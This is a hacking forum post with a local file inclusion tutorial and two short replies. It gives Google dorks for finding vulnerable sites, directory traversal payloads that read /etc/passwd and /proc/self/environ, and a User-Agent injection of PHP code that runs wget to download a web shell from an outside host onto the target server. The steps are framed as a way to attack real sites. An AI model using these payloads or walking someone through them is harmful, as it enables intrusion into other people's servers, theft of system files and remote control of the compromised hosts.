[Merkuri]

Hello here, I write for LFI hope you like it.

What is LFI.

Code:

Local File Inclusion (also known as LFI) is the process of including files on a server through the web browser. This vulnerability occurs when a page include is not properly sanitized, and allows directory traversal characters to be injected.

-Hakipedia

Finding vulnerable site.
Here are some google dorks

Code:

inurl:redirect.php?page=
inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=
inurl:/include/new-visitor.inc.php?lvc_include_dir=
inurl:/_functions.php?prefix=
inurl:/cpcommerce/_functions.php?prefix=

Testing for vulneravility.

Ok to test website for LFI isn't so hard lets say that my URL is www.site.com/view.php?page=pictures .
Change text after = with ../ .

Code:

www.site.com/view.php?page=../

And should pop-up error.

Code:

Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/site.com/view.php on line 1337

If error is similar to this then there is big chance tthe site to be vulnerable. Now type etc/passwd after the ../ .

Code:

www.site.com/view.php?page=../etc/passwd

Now you get the same error go some dir's up (add more ../), if, you get diffrent text you have include the succesfully included the etc/passwd file. Here is example of this error

Code:

root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin test:x:13:30:test:/var/test:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin

Ok now lets check for proc/self/environ.
just change etc/passwd with proc/self/environ

Code:

www.site.com/view.php?page=../proc/self/environ

If you get error like this.

Code:

DOCUMENT_ROOT=/home/sirgod/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac HTTP_HOST=www.site.com HTTP_REFERER=http://www.site.com/index.php?view=../../../../../../etc/passwd HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00 PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665 REQUEST_METHOD=GET REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron SCRIPT_FILENAME=/home/sirgod/public_html/index.php SCRIPT_NAME=/index.php SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=webmaster@site.com SERVER_NAME=www.site.com SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=
Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.site.com Port 80

The proc/self/environ is accessible. If you get blank page proc/self/environ isn't accessible or the OS is FreeBSF.

Exploting
Now let's inject shell on the site.
You will need temper data add-on for Firefox.
Start temper data and refresh/request the /proc/self/eniron URL.

Code:

Temper data started.
www.site.com/view?page=../proc/self/environ

And change user agent whit this code.

Code:

<?system(‘wget www.link-to-your-shell.com/shell.txt -O shell.php’);?>

Raplace www.link-to-your-shell.com/shell.txt with link to your shell.

Now to check if the upload was succesful go to www.site.com/shell.php
Is it was uploaded you have succesfully attack the site !

[Crow_SL]

Good to see both LFI and RFI here, keep up the good work

[Adorapuff]

What kind of shell should we use for the last step?